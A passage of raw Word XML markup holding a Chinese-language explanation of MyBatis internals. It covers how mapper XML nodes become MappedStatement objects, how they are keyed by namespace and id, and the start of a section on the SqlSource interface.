          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>框架中用于表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>文件中一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>语句节点，即一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>&lt;select /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>&lt;update /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>&lt;insert /&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>标签。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>框架在初始化阶段会对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>配置文件进行读取，将其中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>语句节点对象化为一个个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>org.apache.ibatis.session.Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>getMappedStatement(String id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>方法，可以检索到一个特定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>。为了区分不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>文件中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>节点，其中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>String id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>方法参数，是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mapper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>作为前缀，再加上该节点本身的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>值。比如上面生成的两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>框架中的唯一标识分别是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>mybatis.UserDao.find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>mybatis.UserDao.find2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>我们可以看到其中的属性基本上和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>元素的属性有对应关系，其中比较重要的有表示查询参数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>ParameterMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象，表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>查询结果映射关系的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>ResultMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>resultMaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>，当然最重要的还是执行动态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>计算和获取的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>SqlSource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象。通过这些对象的通力合作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>接受用户的查询参数对象，动态计算出要执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>语句，在数据库中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>语句后，再将取得的数据封装为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>JavaBean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象返回给用户。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>MappedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象的这些功能，也体现出了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>这个框架的核心价值，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>“根据用户提供的查询参数对象，动态执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>语句，并将结果封装为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>对象”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>2.org.apache.ibatis.mapping.SqlSource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00EC15F8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SqlSource是一个接口类，在MappedStatement对象中是作为一个属性出现的，它的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00EC15F8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
